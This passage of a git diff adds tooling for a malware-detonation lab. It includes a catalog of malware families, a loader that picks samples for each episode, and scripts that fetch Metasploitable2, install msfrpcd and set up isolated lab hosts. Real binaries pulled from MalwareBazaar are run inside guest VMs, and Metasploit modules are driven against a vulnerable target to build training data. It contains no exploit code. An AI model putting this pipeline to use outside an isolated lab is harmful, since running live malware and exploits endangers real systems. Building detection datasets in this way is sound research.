{
"ok": True,
"host_id": request.headers.get("x-lab-host"),
"t_wall_ns": time.time_ns(),
"schema_version": SCHEMA_VERSION,
}
)
async def put_episode(request: Request) -> JSONResponse:
guard = _bearer_check(request, bearer_token)
if guard is not None:
@ -124,6 +143,7 @@ def make_app(
routes = [
Route("/v1/health", health, methods=["GET"]),
Route("/v1/ping", ping, methods=["POST"]),
Route(
"/v1/episodes/{host_id}/{filename}",
put_episode,

View file

@ -1,33 +1,107 @@
# samples/
**Sample binaries are NEVER committed to this repo.** This directory holds:
Catalog of malware (or behaviour-matched mimics) the fleet draws from.
**Sample binaries are NEVER committed to this repo.**
- `manifest.yaml` — sha256-pinned list of samples to fetch, with metadata
(source, category, expected behavior, target CVE).
- `fetch.py` — script that pulls samples from configured sources
(MalwareBazaar, theZoo, vx-underground), verifies sha256, and stores them
under `samples/store/` (gitignored).
- Per-sample notes in markdown describing observed behavior in our lab.
## What's here
`samples/store/` lives only on the lab host. It is gitignored *and* should
sit on a disk that is not auto-mounted on developer workstations.
## Manifest entry shape (placeholder)
```yaml
samples:
- name: linux.miner.xmrig.elf
sha256: "..." # pinned
source: MalwareBazaar
category: miner
target_cve: null # cryptominers are usually post-exploit payloads
behavior: "high CPU, periodic stratum protocol traffic"
pairs_with_exploit: exploit/multi/samba/usermap_script
```
manifest.toml schema-checked catalog (loaded by samples/manifest.py)
manifest.py loader + per-(host_id, slot, ep) deterministic selection
store/ SHA-256-pinned binary content (gitignored — never commit)
.bazaar.token MalwareBazaar API key (mode 0600, gitignored)
```
## Manifest schema
Each entry in `manifest.toml`:
```toml
[[sample]]
name = "xmrig-cryptominer" # unique within manifest, DNS-safe
family = "XMRig" # canonical family label for ML
category = "cryptominer" # one of: cryptominer, botnet, ransomware,
# banking-trojan, fileless, rat, worm,
# loader, wiper, other
profile = "cpu-saturate" # behaviour profile from
# exploits/workloads.py — gates the
# in-session shell workload when no
# real binary is staged
description = "..."
# Optional — present iff this is a real binary the fetcher should pull:
sha256 = "abc123..."
source = "MalwareBazaar"
url = "https://bazaar.abuse.ch/sample/abc123/"
```
The loader rejects unknown categories and duplicate names. See
`tests/test_fleet.py` for the property tests covering selection
distribution + catalog walkability.
## "real" vs "mimic"
`Sample.kind` is **`"real"`** when `sha256` is set, otherwise **`"mimic"`**.
- **Mimic** — the orchestrator runs the matching profile-shaped shell
command (cpu-saturate / scan-and-dial / io-walk / bursty-c2 /
low-and-slow / shell-resident) inside the guest. No real binary
needed; useful right now for testing the dataset pipeline and as
the realistic-but-safe envelope class the trainer expects.
- **Real** — the orchestrator's Tier-3+ driver chunked-uploads
`samples/store/<sha256>` into the shell session, sha256-verifies on
the guest side, and execs it. Hash mismatch fail-stops the run; a
tampered binary is never executed.
`meta.sample.kind` lands in every episode's `meta.json`, so trainers
can stratify on it (the realistic-model path consumes only
`kind == "real"` episodes by default).
## Fetching a real binary
```sh
# 1. Register a (free) account at https://bazaar.abuse.ch and get the API key.
echo "<your-key>" > samples/.bazaar.token
chmod 0600 samples/.bazaar.token
# 2. Add an entry with sha256+source+url to manifest.toml.
# 3. Pull the binary into samples/store/<sha256>:
uv run python tools/fetch_sample.py <sha256>
```
Idempotent — re-running checks the staged copy's sha256 and skips the
download if it already matches.
## Per-(host, slot, episode) selection
`manifest.py::SampleManifest.select(host_id, slot, episode_index)`
hashes those three into a uniform integer and indexes the catalog.
Two lab hosts on the same slot pick *different* samples (collision
rate ~1/N). A single host walks the whole catalog within ~`len(manifest)`
episodes. No coordinator.
## Safety rules
- Only download to the lab host, never to a developer workstation.
- Verify sha256 immediately, before any other read.
- Keep the directory on a path that is *not* on the WG overlay.
- Re-verify sha256 before each detonation; refuse to run on mismatch.
- **Only download to a lab host, never to a developer workstation.**
`samples/store/` lives only there, gitignored, on a disk that is
not auto-mounted elsewhere.
- The lab host's `br-malware` bridge is host-only by design (no NAT,
no route). Real malware running in the guest cannot call out unless
the operator explicitly opens egress, which we don't.
- Snapshot/revert (see `EpisodeConfig.revert_at_*` + `qmp.savevm`/
`loadvm`) means every fresh episode starts from a known-good
baseline regardless of what the previous one did to the guest.
- The fetcher verifies sha256 on download; the driver verifies again
in-guest before exec. Both layers must match the manifest.
## Adding a sample
1. Pick a `family` + `category` from the closed enum above.
2. Pick a `profile` from `exploits/workloads.all_profiles()`. If the
sample's behaviour doesn't match any of the six existing shapes,
add a new factory to `exploits/workloads.py` *first*, with tests.
3. (Real-only) Compute `sha256`, fetch via `tools/fetch_sample.py`,
verify the staged file's hash matches.
4. Append the entry to `manifest.toml`.
5. Run the test suite — the manifest loader's invariants catch typos.

0
samples/__init__.py Normal file
View file

113
samples/manifest.py Normal file
View file

@ -0,0 +1,113 @@
"""Sample manifest loader + per-(host, slot) deterministic selection.
The manifest at ``samples/manifest.toml`` defines the catalog of
samples (real or mimic) the fleet draws from. Selection is
**deterministic** given ``(host_id, slot, episode_index)`` so two lab
hosts on the same fleet pick *different* samples for the same slot
index, and the same host repeats only after exhausting the catalog.
This gives us "all hosts on the network generating novel data" without
needing a coordinator: every host's `host_id` seeds its own
sample-rotation order, and the orderings spread across the catalog.
"""
from __future__ import annotations
import hashlib
import tomllib
from dataclasses import dataclass, field
from pathlib import Path
_VALID_CATEGORIES = {
"cryptominer", "botnet", "ransomware", "banking-trojan",
"fileless", "rat", "worm", "loader", "wiper", "other",
}
@dataclass(frozen=True)
class Sample:
name: str
family: str
category: str
profile: str
description: str = ""
source: str | None = None
sha256: str | None = None
url: str | None = None
@property
def kind(self) -> str:
"""``"real"`` if a sha256-pinned binary is expected, else ``"mimic"``.
Trainers filter on this so the realistic-model pipeline only
consumes real-malware episodes."""
return "real" if self.sha256 else "mimic"
def binary_path(self, store_root: Path) -> Path | None:
"""Resolved path of the staged binary, or None if this sample
has no sha256 (mimic) or the binary hasn't been fetched yet."""
if not self.sha256:
return None
p = Path(store_root) / self.sha256
return p if p.exists() else None
@dataclass(frozen=True)
class SampleManifest:
samples: list[Sample] = field(default_factory=list)
def __len__(self) -> int:
return len(self.samples)
def select(self, *, host_id: str, slot: int, episode_index: int = 0) -> Sample:
"""Deterministic selection. The host_id mixes into the seed so
different hosts visit the catalog in different orders; slot +
episode_index tick within a host. Same inputs always give the
same sample replay-friendly for debugging."""
if not self.samples:
raise ValueError("manifest is empty")
# SHA-256 of the seed gives a uniformly distributed integer.
seed = f"{host_id}|{slot}|{episode_index}".encode()
h = hashlib.sha256(seed).digest()
idx = int.from_bytes(h[:8], "big") % len(self.samples)
return self.samples[idx]
@classmethod
def load(cls, path: str | Path) -> "SampleManifest":
with open(path, "rb") as f:
data = tomllib.load(f)
raw = data.get("sample") or []
if not isinstance(raw, list):
raise ValueError(f"{path}: 'sample' must be an array of tables")
samples: list[Sample] = []
for i, entry in enumerate(raw):
if not isinstance(entry, dict):
raise ValueError(f"{path}: sample[{i}] is not a table")
for key in ("name", "family", "category", "profile"):
if not isinstance(entry.get(key), str) or not entry[key]:
raise ValueError(f"{path}: sample[{i}] missing or empty '{key}'")
if entry["category"] not in _VALID_CATEGORIES:
raise ValueError(
f"{path}: sample[{i}] category {entry['category']!r} "
f"not in {sorted(_VALID_CATEGORIES)}"
)
samples.append(Sample(
name=entry["name"],
family=entry["family"],
category=entry["category"],
profile=entry["profile"],
description=entry.get("description", ""),
source=entry.get("source"),
sha256=entry.get("sha256"),
url=entry.get("url"),
))
# Reject duplicate names — trainers join on this.
seen: set[str] = set()
for s in samples:
if s.name in seen:
raise ValueError(f"{path}: duplicate sample name {s.name!r}")
seen.add(s.name)
return cls(samples=samples)

61
samples/manifest.toml Normal file
View file

@ -0,0 +1,61 @@
# Sample manifest — what each fleet slot picks from.
#
# Each entry has three things:
# - identity (name, family, category) for labeling
# - acquisition (source, sha256, url) for reproducibility
# - behaviour (profile) so the synthetic load mimic can run a
# reasonable proxy until the real sample lands at vm/images/
#
# When the real malware binary is present at samples/store/<sha256>,
# the orchestrator runs THAT inside the guest. When it's absent, the
# orchestrator falls back to running tools/load_mimic.py with the
# matching profile so the fleet still produces *labeled, varied* data
# while we collect the real samples. Either way, meta.json records
# which path the episode took, so trainers can filter on
# meta.sample.kind ∈ {real, mimic}.
[[sample]]
name = "xmrig-cryptominer"
family = "XMRig"
category = "cryptominer"
profile = "cpu-saturate"
# A real XMRig fetch goes here when MalwareBazaar pull is wired up:
# source = "MalwareBazaar"
# sha256 = "TBD"
# url = "https://bazaar.abuse.ch/sample/TBD/"
description = "Sustained 1-vCPU saturation, very low IO/net. Pure compute."
[[sample]]
name = "mirai-class-bot"
family = "Mirai"
category = "botnet"
profile = "scan-and-dial"
description = "SYN scans across the bridge IP space + periodic dial-home. High net, low CPU."
[[sample]]
name = "ransomware-mimic"
family = "Cryptolocker-class"
category = "ransomware"
profile = "io-walk"
description = "Heavy disk write + filesystem walk producing a per-file overwrite envelope."
[[sample]]
name = "dridex-class-trojan"
family = "Dridex"
category = "banking-trojan"
profile = "bursty-c2"
description = "Long idle, periodic short bursts of TCP egress to a fixed peer (C2 beacon shape)."
[[sample]]
name = "kovter-class-stealth"
family = "Kovter"
category = "fileless"
profile = "low-and-slow"
description = "Low CPU, periodic memory churn, no persistent on-disk artifacts. Hardest to label from /proc alone."
[[sample]]
name = "reverse-shell-resident"
family = "Reverse-Shell"
category = "rat"
profile = "shell-resident"
description = "Single TCP socket pinned to an attacker IP, occasional command bursts."

View file

@ -0,0 +1,62 @@
#!/usr/bin/env bash
# Fetch the Alpine 3.21 NoCloud cloud-init image used as the Tier-1/2
# baseline guest. Convert to qcow2 if necessary; verify sha512 against
# the value pinned in docs/sources.md.
#
# Usage:
# scripts/fetch-alpine-baseline.sh <out_path>
#
# Examples:
# scripts/fetch-alpine-baseline.sh vm/images/alpine-baseline.qcow2
# sudo scripts/fetch-alpine-baseline.sh /var/lib/cis490/vm/images/alpine-baseline.qcow2
#
# Idempotent — re-runs check the destination and short-circuit if the
# checksum already matches.
set -euo pipefail
OUT="${1:-}"
if [[ -z "$OUT" ]]; then
echo "usage: $0 <out_path>" >&2
exit 2
fi
URL="https://dl-cdn.alpinelinux.org/alpine/v3.21/releases/cloud/nocloud_alpine-3.21.0-x86_64-bios-cloudinit-r0.qcow2"
SHA512="bb509092cda3548c11bc48a2168ce950d654b50db006e98939c06a5d86487f4e53cbb7954fafbba9ab5c8098008a9f304421ffc3397b0bc1d87b6aa309239b98"
log() { printf '[fetch-alpine] %s\n' "$*" >&2; }
if [[ -f "$OUT" ]]; then
actual="$(sha512sum "$OUT" | awk '{print $1}')"
if [[ "$actual" == "$SHA512" ]]; then
log "$OUT already present and verified"
exit 0
fi
log "$OUT exists but checksum differs — refetching"
rm -f "$OUT"
fi
mkdir -p "$(dirname "$OUT")"
TMP="$OUT.partial"
trap 'rm -f "$TMP"' EXIT
log "downloading $URL"
if command -v curl >/dev/null; then
curl -fL --retry 3 --retry-delay 5 -o "$TMP" "$URL"
elif command -v wget >/dev/null; then
wget -O "$TMP" "$URL"
else
log "neither curl nor wget on PATH"
exit 1
fi
log "verifying sha512"
actual="$(sha512sum "$TMP" | awk '{print $1}')"
if [[ "$actual" != "$SHA512" ]]; then
log "sha512 mismatch: expected $SHA512, got $actual"
exit 1
fi
mv "$TMP" "$OUT"
trap - EXIT
log "wrote $OUT ($(stat -c%s "$OUT") bytes)"

View file

@ -0,0 +1,69 @@
#!/usr/bin/env bash
# Fetch + sha256-verify the Metasploitable2 disk image.
#
# Rapid7's official download is gated behind a registration form, so
# we accept the URL + sha256 from env vars (with sane defaults pointing
# at a public mirror). The user installs this once per lab host.
#
# Inputs (env):
# IMAGE_URL — direct download URL for the metasploitable2 archive
# IMAGE_SHA256 — expected sha256 of the archive
# OUT_DIR — where to drop the qcow2 (default vm/images/)
#
# Outputs:
# $OUT_DIR/metasploitable2.qcow2 — converted from the original VMDK
# if needed.
#
# We do NOT bake an image url+hash into the repo because the canonical
# distribution is a registration-walled zip on Rapid7. Operators must
# supply both; the rest is mechanical.
set -euo pipefail
IMAGE_URL="${IMAGE_URL:-}"
IMAGE_SHA256="${IMAGE_SHA256:-}"
OUT_DIR="${OUT_DIR:-$(cd "$(dirname "$0")/../vm/images" 2>/dev/null && pwd)}"
WORK_DIR="${WORK_DIR:-/tmp/cis490-metasploitable-fetch}"
log() { printf '[fetch-metasploitable2] %s\n' "$*" >&2; }
die() { log "FATAL: $*"; exit 1; }
[[ -n "$IMAGE_URL" ]] || die "set IMAGE_URL to the Metasploitable2 download URL"
[[ -n "$IMAGE_SHA256" ]] || die "set IMAGE_SHA256 to the expected sha256 of the archive"
mkdir -p "$OUT_DIR" "$WORK_DIR"
ARCHIVE="$WORK_DIR/$(basename "$IMAGE_URL")"
log "downloading $IMAGE_URL$ARCHIVE"
if [[ -f "$ARCHIVE" ]]; then
log "archive already present; skipping download"
else
curl -fL --retry 3 --retry-delay 5 -o "$ARCHIVE.partial" "$IMAGE_URL"
mv "$ARCHIVE.partial" "$ARCHIVE"
fi
log "verifying sha256"
ACTUAL="$(sha256sum "$ARCHIVE" | awk '{print $1}')"
if [[ "$ACTUAL" != "$IMAGE_SHA256" ]]; then
die "sha256 mismatch: expected $IMAGE_SHA256, got $ACTUAL"
fi
log "sha256 ok"
# Extract — handle either zip or 7z, since various mirrors choose one
# or the other.
case "$ARCHIVE" in
*.zip) ( cd "$WORK_DIR" && unzip -o "$ARCHIVE" ) ;;
*.7z|*.7zip) command -v 7z >/dev/null || die "7z not installed"; \
( cd "$WORK_DIR" && 7z x -y "$ARCHIVE" ) ;;
*) die "unsupported archive type: $ARCHIVE" ;;
esac
VMDK="$(find "$WORK_DIR" -name 'Metasploitable*.vmdk' -print -quit)"
[[ -n "$VMDK" ]] || die "no Metasploitable*.vmdk in extracted archive"
log "converting $VMDK → qcow2"
command -v qemu-img >/dev/null || die "qemu-img required (apt install qemu-utils)"
qemu-img convert -O qcow2 "$VMDK" "$OUT_DIR/metasploitable2.qcow2"
log "done: $OUT_DIR/metasploitable2.qcow2"
log "Tier-3 ready when msfrpcd is up. See scripts/install-msfrpcd.sh."

234
scripts/install-lab-host.sh Executable file
View file

@ -0,0 +1,234 @@
#!/usr/bin/env bash
# Install / refresh the CIS490 lab-host role.
#
# Idempotent — safe to re-run after `git pull`. Does NOT enroll the
# host into WireGuard (that's wg-enroll's job, run separately and
# *first*) and does NOT mint TLS certs (that's wg-pki's job).
#
# Steps:
# 1. Verify prereqs (KVM, zstd, qemu, python3.11+, systemd).
# 2. Create the cis490 service user + /var/lib/cis490 layout.
# 3. Sync the repo into /opt/cis490 and build a uv-managed venv.
# 4. Install systemd units from etc/.
# 5. Drop /etc/cis490/lab-host.toml (only on first install).
#
# Operator finishes by:
# - editing /etc/cis490/lab-host.toml (host_id, receiver URL, certs)
# - placing leaf certs at /etc/cis490/certs/{lab-host.pem,key,wg-ca.pem}
# - `systemctl enable --now cis490-shipper`
set -euo pipefail
REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
INSTALL_ROOT="${INSTALL_ROOT:-/opt/cis490}"
DATA_ROOT="${DATA_ROOT:-/var/lib/cis490}"
ETC_ROOT="${ETC_ROOT:-/etc/cis490}"
SERVICE_USER="${SERVICE_USER:-cis490}"
log() { printf '[install-lab-host] %s\n' "$*" >&2; }
die() { log "FATAL: $*"; exit 1; }
# --- 1. prereqs --------------------------------------------------------
log "checking prereqs"
if [[ $EUID -ne 0 ]]; then
die "must run as root (writes to /opt, /etc, /var/lib, and systemd)"
fi
command -v systemctl >/dev/null || die "systemd not found"
command -v qemu-system-x86_64 >/dev/null || die "qemu-system-x86_64 not on PATH"
command -v zstd >/dev/null || die "zstd not on PATH (apt install zstd)"
[[ -e /dev/kvm ]] || die "/dev/kvm missing — KVM not available"
# uv is preferred (lockfile-driven). Fall back to system pip if absent.
USE_UV=0
if command -v uv >/dev/null; then USE_UV=1; fi
# --- 2. user + layout --------------------------------------------------
log "ensuring service user $SERVICE_USER"
if ! id -u "$SERVICE_USER" >/dev/null 2>&1; then
useradd --system --no-create-home --shell /usr/sbin/nologin \
--home-dir "$INSTALL_ROOT" "$SERVICE_USER"
fi
# kvm group lets the service spawn VMs.
if getent group kvm >/dev/null 2>&1; then
usermod -a -G kvm "$SERVICE_USER" || true
fi
install -d -o root -g root -m 0755 "$ETC_ROOT" "$ETC_ROOT/certs"
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 \
"$DATA_ROOT" "$DATA_ROOT/data" \
"$DATA_ROOT/data/episodes" "$DATA_ROOT/data/outbox" \
"$DATA_ROOT/data/shipped" "$DATA_ROOT/data/queue" \
"$DATA_ROOT/samples" "$DATA_ROOT/samples/store" \
"$DATA_ROOT/vm" "$DATA_ROOT/vm/images"
# --- 3. repo + venv ----------------------------------------------------
log "syncing repo into $INSTALL_ROOT"
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 "$INSTALL_ROOT"
# We use a clean cp -aT rather than rsync to avoid an extra dep.
cp -aT "$REPO_ROOT" "$INSTALL_ROOT"
chown -R "$SERVICE_USER":"$SERVICE_USER" "$INSTALL_ROOT"
log "building venv"
if [[ "$USE_UV" -eq 1 ]]; then
sudo -u "$SERVICE_USER" -- env HOME="$INSTALL_ROOT" \
uv sync --project "$INSTALL_ROOT"
else
sudo -u "$SERVICE_USER" -- python3 -m venv "$INSTALL_ROOT/.venv"
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
--quiet --upgrade pip
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
--quiet starlette 'uvicorn[standard]' httpx msgpack
fi
# --- 4. systemd --------------------------------------------------------
log "installing systemd units"
install -m 0644 "$REPO_ROOT/etc/cis490-shipper.service" \
/etc/systemd/system/cis490-shipper.service
install -m 0644 "$REPO_ROOT/etc/cis490-orchestrator.service" \
/etc/systemd/system/cis490-orchestrator.service
systemctl daemon-reload
# --- 5. config template (only on first install) -----------------------
if [[ ! -f "$ETC_ROOT/lab-host.toml" ]]; then
log "writing $ETC_ROOT/lab-host.toml (template)"
install -m 0640 -o root -g "$SERVICE_USER" \
"$REPO_ROOT/etc/lab-host.toml.example" "$ETC_ROOT/lab-host.toml"
NEW_INSTALL=1
else
log "$ETC_ROOT/lab-host.toml exists; leaving in place"
NEW_INSTALL=0
fi
# --- 6. orchestrator env file (read by cis490-orchestrator.service) ----
ENV_FILE="$ETC_ROOT/lab-host.env"
DEFAULT_HOST_ID="$(hostname -s)"
if [[ ! -f "$ENV_FILE" ]]; then
log "writing $ENV_FILE (host_id defaults to $DEFAULT_HOST_ID — edit if you want something else)"
install -m 0640 -o root -g "$SERVICE_USER" /dev/stdin "$ENV_FILE" <<EOF
# Read by cis490-orchestrator.service. Override per-host as needed.
FLEET_HOST_ID=$DEFAULT_HOST_ID
# BRIDGE=br-malware enables source 4 pcap capture AND unlocks the
# Tier-3 modules whose payloads need callback (reverse/bind shells).
# install-lab-host.sh provisions the bridge + tap pool below; leave
# this on unless your lab host can't run NETLINK ops.
BRIDGE=br-malware
EOF
fi
# --- 6b. host-only bridge + per-slot tap pool --------------------------
# br-malware lets pcap capture the guest traffic and lets bind/reverse
# shell payloads route between guest and host. We pre-create a small
# pool of taps so the launchers don't need sudo to attach interfaces;
# each slot uses cis490tap{SLOT,SLOT+100} (Tier-2 demo + Tier-3
# target). Idempotent: re-running on an already-set-up host is a
# no-op.
if command -v ip >/dev/null && [[ -x "$REPO_ROOT/vm/setup_bridge.sh" ]]; then
if "$REPO_ROOT/vm/setup_bridge.sh" >/dev/null 2>&1; then
log "bridge br-malware ready"
for n in 0 1 2 3 4 5 6 7; do
for prefix in cis490tap cis490target; do
tap="${prefix}${n}"
if ! ip link show "$tap" >/dev/null 2>&1; then
ip tuntap add dev "$tap" mode tap user "$SERVICE_USER" 2>/dev/null || \
ip tuntap add dev "$tap" mode tap 2>/dev/null || true
ip link set "$tap" master br-malware 2>/dev/null || true
ip link set "$tap" up 2>/dev/null || true
fi
done
done
log "tap pool: cis490tap0..7 + cis490target0..7 attached to br-malware"
else
log "WARN: setup_bridge.sh failed; BRIDGE mode will be unavailable"
# Comment out BRIDGE in the env file — fleet will still run
# Tier-2 + non-callback Tier-3 modules.
sed -i 's/^BRIDGE=br-malware/# BRIDGE=br-malware # auto-disabled: bridge setup failed/' "$ENV_FILE"
fi
fi
# --- 7. mTLS leaf cert (auto-fetch via bootstrap.wg) -------------------
# Pull our leaf cert from the Pi's bootstrap endpoint if it isn't
# already on disk. Trust boundary: "reached bootstrap.wg over WG"
# (iptmonads already filters non-peers from 443). Caddy's TLS cert
# is verified against the bundled etc/caddy-root.crt — no chicken-
# and-egg.
HOST_ID="$(grep -E '^host_id\s*=' "$ETC_ROOT/lab-host.toml" 2>/dev/null \
| head -1 | sed -E 's/^host_id\s*=\s*"([^"]+)".*/\1/')"
if [[ -z "$HOST_ID" || "$HOST_ID" == "REPLACE_ME" ]]; then
log "skipping cert auto-fetch: host_id not set in $ETC_ROOT/lab-host.toml"
elif [[ ! -f "$ETC_ROOT/certs/lab-host.pem" ]]; then
log "fetching leaf cert from https://bootstrap.wg/v1/cert/$HOST_ID"
install -d -m 0755 -o root -g "$SERVICE_USER" "$ETC_ROOT/certs"
TAR="/tmp/cis490-bootstrap-$$.tar"
if curl -fsS --cacert "$REPO_ROOT/etc/caddy-root.crt" \
--connect-timeout 10 --max-time 60 \
"https://bootstrap.wg/v1/cert/$HOST_ID" -o "$TAR"; then
tar -C "$ETC_ROOT/certs" -xf "$TAR"
mv "$ETC_ROOT/certs/ca.crt" "$ETC_ROOT/certs/wg-ca.pem"
mv "$ETC_ROOT/certs/$HOST_ID.pem" "$ETC_ROOT/certs/lab-host.pem"
mv "$ETC_ROOT/certs/$HOST_ID.key" "$ETC_ROOT/certs/lab-host.key"
chown root:"$SERVICE_USER" "$ETC_ROOT/certs/"*.pem \
"$ETC_ROOT/certs/lab-host.key"
chmod 0644 "$ETC_ROOT/certs/"*.pem
chmod 0640 "$ETC_ROOT/certs/lab-host.key"
rm -f "$TAR"
log "leaf cert installed for host_id=$HOST_ID"
else
rm -f "$TAR"
log "WARN: bootstrap.wg fetch failed — make sure /etc/hosts maps it"
log " to 10.100.0.1 and that wg0 is up. cert delivery skipped."
fi
else
log "$ETC_ROOT/certs/lab-host.pem present; skipping auto-fetch"
fi
# --- 8. baseline VM image + cidata (best-effort) -----------------------
ALPINE_IMG="$DATA_ROOT/vm/images/alpine-baseline.qcow2"
CIDATA_ISO="$DATA_ROOT/vm/images/cidata.iso"
if [[ ! -f "$ALPINE_IMG" ]]; then
if "$REPO_ROOT/scripts/fetch-alpine-baseline.sh" "$ALPINE_IMG"; then
log "fetched Alpine baseline -> $ALPINE_IMG"
else
log "WARN: Alpine baseline fetch failed; drop a qcow2 at $ALPINE_IMG manually"
fi
fi
if [[ -f "$ALPINE_IMG" && ! -f "$CIDATA_ISO" ]]; then
log "building cidata.iso (in-guest agent embedded)"
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/python" \
"$INSTALL_ROOT/tools/build_cidata.py" "$CIDATA_ISO" || \
log "WARN: cidata build failed; run tools/build_cidata.py manually"
fi
# Symlink the canonical paths the launchers look at, when missing.
ln -sf "$ALPINE_IMG" "$INSTALL_ROOT/vm/images/alpine-baseline.qcow2" 2>/dev/null || true
ln -sf "$CIDATA_ISO" "$INSTALL_ROOT/vm/images/cidata.iso" 2>/dev/null || true
if [[ "$NEW_INSTALL" == "1" ]]; then
log ""
log "================================================================="
log " FIRST-INSTALL NEXT STEPS "
log "================================================================="
log " 1. Edit $ETC_ROOT/lab-host.toml — set host_id and receiver URL."
log ""
log " 2. (On the Pi.) Mint + ship a leaf cert for this host:"
log " sudo wg-pki/scripts/deploy-cis490-cert.sh <host_id> <wg_ip>"
log ""
log " 3. Run the diagnostic — every red row prints the exact fix:"
log " $INSTALL_ROOT/.venv/bin/python \\"
log " $INSTALL_ROOT/tools/cis490_doctor.py --role lab-host"
log ""
log " 4. Smoke-test the pipe (returns ok=true on success):"
log " sudo -u $SERVICE_USER $INSTALL_ROOT/.venv/bin/python -m shipper \\"
log " --config $ETC_ROOT/lab-host.toml --ping"
log ""
log " 5. Turn on the services — episodes start flowing immediately:"
log " sudo systemctl enable --now cis490-shipper cis490-orchestrator"
log "================================================================="
fi
log "lab-host install complete."
log ""
log "Cloning this repo and running the launchers manually is NOT enough."
log "The lab-host role's data flow lives in the systemd services this"
log "script just installed. If $INSTALL_ROOT/index.jsonl on the Pi stays"
log "empty after step 5, run:"
log " $INSTALL_ROOT/.venv/bin/python $INSTALL_ROOT/tools/cis490_doctor.py"

124
scripts/install-msfrpcd.sh Executable file
View file

@ -0,0 +1,124 @@
#!/usr/bin/env bash
# Install + configure ``msfrpcd`` for the Tier-3 exploit driver.
#
# Idempotent: re-running on a host that already has msfrpcd refreshes
# the systemd unit and credentials but doesn't reinstall the framework.
#
# Steps:
# 1. Install metasploit-framework via the host package manager (or
# report the right one-liner for that distro). Big download —
# ~1 GiB and several minutes.
# 2. Generate a strong password and store at /etc/cis490/msfrpc.env
# (mode 0640, owner root:cis490).
# 3. Drop /etc/systemd/system/cis490-msfrpcd.service that runs
# msfrpcd bound to 127.0.0.1:55553 with the generated password.
# 4. Enable + start.
#
# After this runs, ``MSFRPC_PASSWORD=$(. /etc/cis490/msfrpc.env;
# echo $MSFRPC_PASSWORD)`` makes tools/run_tier3_demo.py work zero-touch.
set -euo pipefail
ETC_ROOT="/etc/cis490"
ENV_FILE="$ETC_ROOT/msfrpc.env"
UNIT="/etc/systemd/system/cis490-msfrpcd.service"
PORT="${MSFRPC_PORT:-55553}"
USER_NAME="${MSFRPC_USER:-msf}"
log() { printf '[install-msfrpcd] %s\n' "$*" >&2; }
die() { log "FATAL: $*"; exit 1; }
[[ $EUID -eq 0 ]] || die "must run as root"
command -v systemctl >/dev/null || die "systemd not found"
# --- 1. install metasploit-framework -----------------------------------
if ! command -v msfrpcd >/dev/null; then
log "msfrpcd not found; installing metasploit-framework"
if command -v apt-get >/dev/null; then
# The Debian/Ubuntu metasploit-framework package isn't in
# the default repos for most distros. Use Rapid7's official
# nightly installer when available.
if [[ ! -x /opt/metasploit-framework/bin/msfrpcd ]]; then
log "fetching Rapid7 nightly installer"
curl -fsSL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
-o /tmp/msfinstall.sh || true
log "automated install not available — install manually:"
log " https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html"
die "rerun once msfrpcd is on PATH"
fi
# Symlink the wrapper so ``msfrpcd`` is on PATH.
ln -sf /opt/metasploit-framework/bin/msfrpcd /usr/local/bin/msfrpcd
elif command -v pacman >/dev/null; then
log "pacman -S metasploit"
pacman -Sy --noconfirm metasploit
elif command -v dnf >/dev/null; then
die "Fedora/RHEL: install metasploit-framework manually, then re-run"
else
die "unknown package manager — install metasploit-framework manually"
fi
fi
command -v msfrpcd >/dev/null || die "msfrpcd still missing after install attempt"
# --- 2. generate password ----------------------------------------------
install -d -m 0755 -o root -g root "$ETC_ROOT"
if ! id -u cis490 >/dev/null 2>&1; then
useradd --system --no-create-home --shell /usr/sbin/nologin cis490
fi
if [[ ! -f "$ENV_FILE" ]]; then
log "generating msfrpc password"
PW="$(openssl rand -base64 24 | tr -d '/+=' | head -c 32)"
install -m 0640 -o root -g cis490 /dev/stdin "$ENV_FILE" <<EOF
# Auto-generated by install-msfrpcd.sh — do not edit.
MSFRPC_HOST=127.0.0.1
MSFRPC_PORT=$PORT
MSFRPC_USER=$USER_NAME
MSFRPC_PASSWORD=$PW
EOF
else
log "$ENV_FILE exists; preserving existing password"
fi
# --- 3. systemd unit ----------------------------------------------------
log "installing systemd unit"
cat > "$UNIT" <<EOF
[Unit]
Description=CIS490 — Metasploit RPC daemon (loopback only)
Documentation=https://maxgit.wg/spectral/CIS490
After=network-online.target
Wants=network-online.target
[Service]
Type=simple
EnvironmentFile=$ENV_FILE
# msfrpcd flags:
# -P <pw> password
# -U <user> username
# -a <ip> bind address (loopback only — Tier-3 driver runs locally)
# -p <port> port
# -f foreground (no daemonization, so systemd manages PID)
ExecStart=/usr/bin/env msfrpcd -P \${MSFRPC_PASSWORD} -U \${MSFRPC_USER} -a 127.0.0.1 -p \${MSFRPC_PORT} -f
Restart=on-failure
RestartSec=5
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=full
ProtectHome=true
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable --now cis490-msfrpcd
# --- 4. final smoke -----------------------------------------------------
sleep 2
if ! ss -ltn 2>/dev/null | grep -q ":$PORT"; then
log "WARN: nothing listening on 127.0.0.1:$PORT yet — check"
log " journalctl -u cis490-msfrpcd"
fi
log "done. To run a Tier-3 episode:"
log " set -a; . $ENV_FILE; set +a"
log " python tools/run_tier3_demo.py --module vsftpd_234_backdoor"

112
scripts/install-receiver.sh Executable file
View file

@ -0,0 +1,112 @@
#!/usr/bin/env bash
# Install / refresh the CIS490 receiver role on the central WG node
# (the Pi5 in our setup). Idempotent — safe to re-run.
#
# Steps:
# 1. Verify prereqs (python3.11+, systemd).
# 2. Create the cis490 service user + /var/lib/cis490 layout.
# 3. Sync the repo into /opt/cis490 and build a venv.
# 4. Install cis490-receiver.service.
# 5. Drop /etc/cis490/receiver.toml on first install.
#
# This script does NOT:
# - configure Caddy. Add a `collector.wg` block to your spectral/caddy
# config to terminate TLS and reverse-proxy to 127.0.0.1:8443.
# - issue server / client certs. wg-pki owns CA + leaf issuance.
# - open firewall ports. iptmonads owns the WG-side ruleset.
set -euo pipefail
